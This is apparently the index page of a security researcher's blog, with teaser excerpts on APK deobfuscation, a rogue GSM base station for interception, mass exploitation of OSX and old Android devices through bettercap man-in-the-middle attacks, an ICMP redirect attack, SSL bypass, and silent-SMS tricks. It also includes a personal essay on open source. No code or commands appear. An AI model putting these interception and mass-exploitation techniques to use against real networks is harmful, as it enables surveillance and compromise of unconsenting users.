How I Defeated an Obfuscated and Anti-Tamper APK With Some Python and a Home-Made Smali Emulator.

During this Saturday afternoon I was chatting with a friend of mine ( Matteo ) and he asked for some help to fix a Python script he was working on.

He was trying to deobfuscate an APK in order to understand its obfuscation and anti tampering (more on this later) protections so I started working on it as well.

This was definitely way more challenging ( and fun! ) than my usual APK reversing session ( dex2jar -> jd-gui -> done ), moreover this required me to write a new tool which I find kinda cool and unique ( IMHO of course ), so I’m going to share the story in this post.

I’m going to intentionally skip a few details here and there because I do not want to cause any harm to the people who wrote that application, all the involved protection mechanisms are there to avoid piracy.

Read More

How to Build Your Own Rogue GSM BTS for Fun and Profit

The last week I’ve been visiting my friend and colleque Ziggy in Tel Aviv which gave me something I’ve been waiting for almost a year, a brand new BladeRF x40, a low-cost USB 3.0 Software Defined Radio working in full-duplex, meaning that it can transmit and receive at the same time ( while for instance the HackRF is only half-duplex ).

In this blog post I’m going to explain how to create a portable GSM BTS which can be used either to create a private ( and vendor free! ) GSM network or for GSM active tapping/interception/hijacking … yes, with some (relatively) cheap electronic equipment you can basically build something very similar to what the governments are using from years to perform GSM interception.

I’m not writing this post to help script kiddies breaking the law, my point is that GSM is broken by design and it’s about time vendors do something about it considering how much we’re paying for their services.

my bts

Read More

OSX Mass Pwning Using BetterCap and the Sparkle Updater Vulnerability.


Yesterday Radek from VulnSec posted an interesting article named “There’s a lot of vulnerable OS X applications out there.“, he discovered that the Sparkle update system ( used by some very popular OSX apps such as VLC, Adium, iTerm and so forth ) uses HTTP instead of HTTPS to fetch updates informations for such applications, making all of them vulnerable to man in the middle attacks and, as he shown, remote command execution attacks.

I’m not going to explain the details of his attack, his post is quite self explainatory, but I’ll show you how easy it is to mass pwn OSX machines on your network using the new OSX Sparkle bettercap proxy module.

Read More

Why You Shouldn't Trust CloudFlare's 'Flexible SSL' and How to Bypass It With BetterCap

Let me clear one thing about this post … this is not a CloudFlare vulnerability report and, even in that case, there’s really nothing they could do in order to fix it unless they’d block direct traffic to HTTP websites.
This is only a blog post about why you shouldn’t blindly trust free services that offer you some sort of SSL protection if your server itself is not SSL protected by default.

Read More

Autopwn Every Android < 4.2 Device on Your Network Using BetterCap and the addJavascriptInterface Vulnerability.

Recently I’ve been playing with Android’s WebView based vulnerabilities, focusing on how to exploit them using a MITM attack.
One of the most interesting ones is the addJavascriptInterface vulnerability ( CVE-2012-6636 ) which affects every device running a version older than Android 4.2.

Read More

BetterCap and the First REAL DoubleDirect ICMP Redirect Attack

The next release of bettercap will include a new spoofer module as an alternative to the default ARP spoofer.
The new module performs a fully automated and full duplex ICMP Redirect MITM attack, what my collegues at Zimperium discovered and called a DoubleDirect attack.

BetterCap will be the very first MITM framework to have this feature 100% working without any additional spoofers.

Read More

Past, Present and Future of Bettercap

Four months passed since my first blog post about bettercap, a lot of fixes have been released and a lot of new features have been implemented.
In this post I’d like to talk about some of these new features and describe them a little bit, this is basically a big changelog since the very first version, for a complete list of code changes you can read the releases github page.

Read More

Karma: How Open Source Changed My Life.

( or “How the anarchy of ideas can change things” )

This time I’ve decided to write a purely personal post, mainly because I’ve reached a stage in my life in which I believe I’ve understood a number of things that I’d like to share, in the hopes of helping someone facing similar circumstances to my own.

I don’t feel my knowledge of the English language would have allowed me to express myself accurately, so I wrote this in Italian, and had it translated from a friend of mine ( tnx! ).

Read More

Karma: Come l'Open Source Ha Cambiato La Mia Vita.

The English version of this post can be found here.

( o anche “Come l’anarchia delle idee può cambiare le cose” )

Questa volta voglio scrivere un post di carattere puramente personale, principalmente perchè sono arrivato ad un certo punto della mia vita
nel quale penso di aver capito alcune cose che mi fa piacere condividere e che magari possono aiutare tante persone nella mia stessa situazione.

In Italiano perchè, purtroppo, la mia conoscenza della lingua Inglese non è così approfondita da potermi esprimere al meglio.

Read More

How to Use Old GSM Protocols/encodings to Know if a User Is Online on the GSM Network AKA PingSMS 2.0

In the last few months I’ve been playing with Android’s low level GSM API, a few years ago the (in)famous sendRawPdu API was available, allowing a developer to manually encode a SMS message at a very low level before sending it to the GSM baseband itself and quite a few applications sending all kind of weird SMS ( flash sms, silent sms, etc ) were born ( for a brief overview of PDU encoding refer to this page ).

(Un)fortunately Google decided to remove that API, it’s still not sure if they did it for security related purposes or during some refactoring of their IPC IBinder mechanism, but nowadays it’s no more available unless you use some very old phones/firmwares ( on most devices they removed the ttyUSB serial interfaces to send AT commands to the GSM modem as well ).

Until a couple of months ago, when I found the SmsManager.sendDataMessage API which, apparently, it’s not used anywhere ( if you search for it you’ll find only a few examples, but nothing regarding how to use it with manually encoded PDUs ).
Using this API we’re able to manually encode our SMS, moreover we can specific a “port” as one of its arguments which will identify what kind of sms we’re gonna send, in this post I’ll talk about port 2948, namely the port used to send WAP PUSH notifications.

Read More